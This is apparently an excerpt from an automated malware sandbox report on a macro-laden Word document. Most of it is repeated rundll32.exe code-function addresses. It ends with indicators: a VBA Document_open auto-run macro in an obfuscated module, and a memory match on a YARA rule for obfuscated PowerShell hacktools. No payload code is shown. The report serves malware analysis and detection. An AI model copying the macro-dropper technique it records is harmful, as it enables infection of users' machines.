Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00207F1F	9_2_00207F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FB75F	9_2_001FB75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00200B68	9_2_00200B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F6754	9_2_001F6754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00201773	9_2_00201773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00209B45	9_2_00209B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F5B79	9_2_001F5B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F8F78	9_2_001F8F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FE377	9_2_001FE377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00202349	9_2_00202349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00208F49	9_2_00208F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FC769	9_2_001FC769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F6D9F	9_2_001F6D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F839D	9_2_001F839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F7998	9_2_001F7998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_002073AC	9_2_002073AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FF98C	9_2_001FF98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_002061B8	9_2_002061B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00206DB9	9_2_00206DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00209586	9_2_00209586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0020878F	9_2_0020878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F17AC	9_2_001F17AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F69A0	9_2_001F69A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_002031E2	9_2_002031E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F9FDC	9_2_001F9FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00203FE7	9_2_00203FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_002067E9	9_2_002067E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_002071EF	9_2_002071EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FD7EB	9_2_001FD7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00201BDF	9_2_00201BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FB41F	10_2_001FB41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FEE78	10_2_001FEE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F2C63	10_2_001F2C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F568E	10_2_001F568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00203895	10_2_00203895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FC0C6	10_2_001FC0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002002C3	10_2_002002C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002042DA	10_2_002042DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F8736	10_2_001F8736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00204B41	10_2_00204B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F7B63	10_2_001F7B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002063C1	10_2_002063C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F9A37	10_2_001F9A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020340A	10_2_0020340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F4A35	10_2_001F4A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F2A30	10_2_001F2A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00207A0F	10_2_00207A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00205A61	10_2_00205A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FE05A	10_2_001FE05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FEA4C	10_2_001FEA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FF444	10_2_001FF444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020687F	10_2_0020687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020A0AF	10_2_0020A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F1280	10_2_001F1280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F48BD	10_2_001F48BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F80BA	10_2_001F80BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F60B9	10_2_001F60B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F62A3	10_2_001F62A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020889D	10_2_0020889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002012E2	10_2_002012E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F96CD	10_2_001F96CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002026F5	10_2_002026F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F1CFA	10_2_001F1CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002020C5	10_2_002020C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F88E5	10_2_001F88E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00208ADC	10_2_00208ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FB112	10_2_001FB112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00200D33	10_2_00200D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F153C	10_2_001F153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00207D03	10_2_00207D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FBB3A	10_2_001FBB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FF536	10_2_001FF536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00200F0C	10_2_00200F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00202B16	10_2_00202B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020511B	10_2_0020511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00208D1C	10_2_00208D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00205D1D	10_2_00205D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00207F1F	10_2_00207F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FB75F	10_2_001FB75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00200B68	10_2_00200B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F6754	10_2_001F6754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00201773	10_2_00201773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00209B45	10_2_00209B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F5B79	10_2_001F5B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F8F78	10_2_001F8F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FE377	10_2_001FE377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00202349	10_2_00202349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00208F49	10_2_00208F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FC769	10_2_001FC769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F6D9F	10_2_001F6D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F839D	10_2_001F839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F7998	10_2_001F7998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002073AC	10_2_002073AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FF98C	10_2_001FF98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002061B8	10_2_002061B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00206DB9	10_2_00206DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00209586	10_2_00209586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020878F	10_2_0020878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F17AC	10_2_001F17AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F69A0	10_2_001F69A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002031E2	10_2_002031E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F9FDC	10_2_001F9FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00203FE7	10_2_00203FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002067E9	10_2_002067E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002071EF	10_2_002071EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FD7EB	10_2_001FD7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00201BDF	10_2_00201BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EB41F	11_2_002EB41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E2C63	11_2_002E2C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EEE78	11_2_002EEE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E568E	11_2_002E568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F3895	11_2_002F3895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EC0C6	11_2_002EC0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F02C3	11_2_002F02C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F42DA	11_2_002F42DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E8736	11_2_002E8736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E7B63	11_2_002E7B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F4B41	11_2_002F4B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F63C1	11_2_002F63C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E9A37	11_2_002E9A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E4A35	11_2_002E4A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E2A30	11_2_002E2A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F7A0F	11_2_002F7A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F340A	11_2_002F340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F5A61	11_2_002F5A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F687F	11_2_002F687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EEA4C	11_2_002EEA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EF444	11_2_002EF444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EE05A	11_2_002EE05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002FA0AF	11_2_002FA0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E62A3	11_2_002E62A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E48BD	11_2_002E48BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E80BA	11_2_002E80BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E60B9	11_2_002E60B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E1280	11_2_002E1280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F889D	11_2_002F889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E88E5	11_2_002E88E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F12E2	11_2_002F12E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E1CFA	11_2_002E1CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F26F5	11_2_002F26F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E96CD	11_2_002E96CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F20C5	11_2_002F20C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F8ADC	11_2_002F8ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E153C	11_2_002E153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EBB3A	11_2_002EBB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EF536	11_2_002EF536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F0D33	11_2_002F0D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F0F0C	11_2_002F0F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F7D03	11_2_002F7D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F7F1F	11_2_002F7F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F5D1D	11_2_002F5D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F8D1C	11_2_002F8D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F511B	11_2_002F511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F2B16	11_2_002F2B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EB112	11_2_002EB112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EC769	11_2_002EC769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F0B68	11_2_002F0B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E8F78	11_2_002E8F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E5B79	11_2_002E5B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EE377	11_2_002EE377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F1773	11_2_002F1773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F2349	11_2_002F2349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F8F49	11_2_002F8F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F9B45	11_2_002F9B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EB75F	11_2_002EB75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E6754	11_2_002E6754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E17AC	11_2_002E17AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F73AC	11_2_002F73AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E69A0	11_2_002E69A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F6DB9	11_2_002F6DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F61B8	11_2_002F61B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F878F	11_2_002F878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EF98C	11_2_002EF98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F9586	11_2_002F9586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E6D9F	11_2_002E6D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E839D	11_2_002E839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E7998	11_2_002E7998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F71EF	11_2_002F71EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002ED7EB	11_2_002ED7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F67E9	11_2_002F67E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F3FE7	11_2_002F3FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F31E2	11_2_002F31E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F1BDF	11_2_002F1BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E9FDC	11_2_002E9FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021B41F	12_2_0021B41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00212C63	12_2_00212C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021EE78	12_2_0021EE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021568E	12_2_0021568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00223895	12_2_00223895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002202C3	12_2_002202C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021C0C6	12_2_0021C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002242DA	12_2_002242DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00218736	12_2_00218736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00217B63	12_2_00217B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00224B41	12_2_00224B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002263C1	12_2_002263C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00212A30	12_2_00212A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00214A35	12_2_00214A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00219A37	12_2_00219A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022340A	12_2_0022340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00227A0F	12_2_00227A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00225A61	12_2_00225A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022687F	12_2_0022687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021F444	12_2_0021F444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021EA4C	12_2_0021EA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021E05A	12_2_0021E05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002162A3	12_2_002162A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022A0AF	12_2_0022A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002160B9	12_2_002160B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002180BA	12_2_002180BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002148BD	12_2_002148BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00211280	12_2_00211280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022889D	12_2_0022889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002212E2	12_2_002212E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002188E5	12_2_002188E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002226F5	12_2_002226F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00211CFA	12_2_00211CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002220C5	12_2_002220C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002196CD	12_2_002196CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00228ADC	12_2_00228ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00220D33	12_2_00220D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021F536	12_2_0021F536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021BB3A	12_2_0021BB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021153C	12_2_0021153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00227D03	12_2_00227D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00220F0C	12_2_00220F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021B112	12_2_0021B112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00222B16	12_2_00222B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022511B	12_2_0022511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00227F1F	12_2_00227F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00228D1C	12_2_00228D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00225D1D	12_2_00225D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021C769	12_2_0021C769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00220B68	12_2_00220B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00221773	12_2_00221773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021E377	12_2_0021E377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00215B79	12_2_00215B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00218F78	12_2_00218F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00229B45	12_2_00229B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00222349	12_2_00222349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00228F49	12_2_00228F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00216754	12_2_00216754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021B75F	12_2_0021B75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002169A0	12_2_002169A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002117AC	12_2_002117AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002273AC	12_2_002273AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002261B8	12_2_002261B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00226DB9	12_2_00226DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00229586	12_2_00229586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022878F	12_2_0022878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021F98C	12_2_0021F98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00217998	12_2_00217998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021839D	12_2_0021839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00216D9F	12_2_00216D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002231E2	12_2_002231E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00223FE7	12_2_00223FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021D7EB	12_2_0021D7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002267E9	12_2_002267E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002271EF	12_2_002271EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00221BDF	12_2_00221BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00219FDC	12_2_00219FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001FB41F	13_2_001FB41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00205A61	13_2_00205A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F2C63	13_2_001F2C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F60B9	13_2_001F60B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002002C3	13_2_002002C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F1CFA	13_2_001F1CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F153C	13_2_001F153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00207D03	13_2_00207D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F8736	13_2_001F8736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00202B16	13_2_00202B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00208D1C	13_2_00208D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00204B41	13_2_00204B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F5B79	13_2_001F5B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001FE377	13_2_001FE377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00202349	13_2_00202349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001FC769	13_2_001FC769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002031E2	13_2_002031E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F9FDC	13_2_001F9FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F9A37	13_2_001F9A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0020340A	13_2_0020340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F4A35	13_2_001F4A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F2A30	13_2_001F2A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00207A0F	13_2_00207A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001FE05A	13_2_001FE05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001FEA4C	13_2_001FEA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001FF444	13_2_001FF444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0020687F	13_2_0020687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001FEE78	13_2_001FEE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0020A0AF	13_2_0020A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F568E	13_2_001F568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F1280	13_2_001F1280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F48BD	13_2_001F48BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F80BA	13_2_001F80BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00203895	13_2_00203895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F62A3	13_2_001F62A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0020889D	13_2_0020889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002012E2	13_2_002012E2

Source: MAIL-0573188.doc	OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation	OLE, VBA macro: Module A5gd21klfqu9c6rs, Function Document_open			Name: Document_open

Source: MAIL-0573188.doc

OLE indicator, VBA macros: true

Source: 00000005.00000002.2098977444.00000000003A6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
